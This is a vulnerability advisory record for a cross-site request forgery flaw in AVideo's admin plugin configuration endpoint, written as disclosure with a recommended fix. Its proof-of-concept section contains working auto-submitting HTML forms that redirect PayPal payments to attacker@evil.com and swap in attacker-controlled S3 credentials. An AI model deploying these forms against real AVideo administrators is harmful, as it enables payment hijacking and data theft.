{"id":"GHSA-4wwr-7h7c-chqr","summary":"AVideo's CSRF on Admin Plugin Configuration Enables Payment Credential Hijacking","details":"## Summary\n\nAVideo's admin plugin configuration endpoint (`admin/save.json.php`) lacks any CSRF token validation. There is no call to `isGlobalTokenValid()` or `verifyToken()` before processing the request. Combined with the application's explicit SameSite=None cookie policy, an attacker can forge cross-origin POST requests from a malicious page to overwrite arbitrary plugin settings on a victim administrator's session.\n\nBecause the `plugins` table is included in the `ignoreTableSecurityCheck()` array in `objects/Object.php`, standard table-level access controls are also bypassed. This allows a complete takeover of platform functionality by reconfiguring payment processors, authentication providers, cloud storage credentials, and more.\n\n## Details\n\nThe session cookie configuration in `objects/include_config.php` at line 135 explicitly weakens the default browser protections:\n\n```php\n// objects/include_config.php:135\nini_set('session.cookie_samesite', 'None');\n```\n\nThis means cookies are attached to all cross-origin requests, making CSRF attacks trivial.\n\nThe save endpoint in `admin/save.json.php` directly processes POST data without any token verification:\n\n```php\n// admin/save.json.php\n$pluginName = $_POST['pluginName'];\n$pluginValues = $_POST;\n// ...\n$pluginDO-\u003e$key = $pluginValues[$key];\n$p-\u003esetObject_data(json_encode($pluginDO));\n$p-\u003esave();\n```\n\nThe `plugins` table is explicitly exempted from security checks in `objects/Object.php` at line 529:\n\n```php\n// objects/Object.php:529\nstatic function ignoreTableSecurityCheck() {\n    return ['plugins', /* ... other tables ... */];\n}\n```\n\nEven the ORM-level protections that exist for other tables do not apply to plugin configuration writes.\n\n## Proof of Concept\n\nHost the following HTML on an attacker-controlled domain. When a logged-in AVideo administrator visits this page, their PayPal receiver email is silently changed to the attacker's address:\n\n```html\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003eLoading...\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003cform id=\"csrf\" method=\"POST\" action=\"https://your-avideo-instance.com/admin/save.json.php\"\u003e\n    \u003cinput type=\"hidden\" name=\"pluginName\" value=\"PayPerView\" /\u003e\n    \u003cinput type=\"hidden\" name=\"paypalReceiverEmail\" value=\"attacker@evil.com\" /\u003e\n\u003c/form\u003e\n\u003cscript\u003e\n    document.getElementById('csrf').submit();\n\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\nTo overwrite S3 storage credentials instead:\n\n```html\n\u003cform id=\"csrf\" method=\"POST\" action=\"https://your-avideo-instance.com/admin/save.json.php\"\u003e\n    \u003cinput type=\"hidden\" name=\"pluginName\" value=\"AWS_S3\" /\u003e\n    \u003cinput type=\"hidden\" name=\"region\" value=\"us-east-1\" /\u003e\n    \u003cinput type=\"hidden\" name=\"bucket\" value=\"attacker-bucket\" /\u003e\n    \u003cinput type=\"hidden\" name=\"key\" value=\"ATTACKER_KEY_ID\" /\u003e\n    \u003cinput type=\"hidden\" name=\"secret\" value=\"ATTACKER_SECRET\" /\u003e\n\u003c/form\u003e\n```\n\nReproduction steps:\n\n1. Log in to AVideo as an administrator.\n2. In a separate browser tab, open the attacker's HTML page.\n3. The form auto-submits, overwriting the target plugin configuration.\n4. Verify the change by navigating to the plugin settings page in the admin panel.\n\n## Impact\n\nAn attacker can silently reconfigure any plugin on the AVideo platform by tricking an administrator into visiting a malicious page. Exploitable configurations include:\n\n- **Payment hijacking**: Change PayPal receiver email or Stripe keys to redirect all payments to the attacker.\n- **Credential theft**: Replace S3 bucket credentials so uploaded media is sent to attacker-controlled storage.\n- **Authentication bypass**: Modify LDAP/OAuth plugin settings to point at attacker-controlled identity providers.\n- **Backdoor installation**: Enable and configure plugins to introduce persistent access.\n\nThis is a full platform takeover with zero user interaction beyond a single page visit.\n\n- **CWE**: CWE-352 (Cross-Site Request Forgery)\n\n## Recommended Fix\n\nAdd CSRF token validation at `admin/save.json.php:10`, immediately after the admin check:\n\n```php\n// admin/save.json.php:10\nif (!isGlobalTokenValid()) {\n    die('{\"error\":\"Invalid CSRF token\"}');\n}\n```\n\n---\n*Found by [aisafe.io](https://aisafe.io)*","aliases":["CVE-2026-34394"],"modified":"2026-03-31T23:41:23.670848Z","published":"2026-03-31T23:15:25Z","database_specific":{"github_reviewed_at":"2026-03-31T23:15:25Z","nvd_published_at":"2026-03-31T21:16:30Z","cwe_ids":["CWE-352"],"severity":"HIGH","github_reviewed":true},"references":[{"type":"WEB","url":"https://github.com/WWBN/AVideo/security/advisories/GHSA-4wwr-7h7c-chqr"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34394"},{"type":"PACKAGE","url":"https://github.com/WWBN/AVideo"}],"affected":[{"package":{"name":"wwbn/avideo","ecosystem":"Packagist","purl":"pkg:composer/wwbn/avideo"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"last_affected":"26.0"}]}],"versions":["10.4","10.8","11","11.1","11.1.1","11.5","11.6","12.4","14.3","14.3.1","14.4","18.0","21.0","22.0","24.0","25.0","26.0"],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/03/GHSA-4wwr-7h7c-chqr/GHSA-4wwr-7h7c-chqr.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"}]}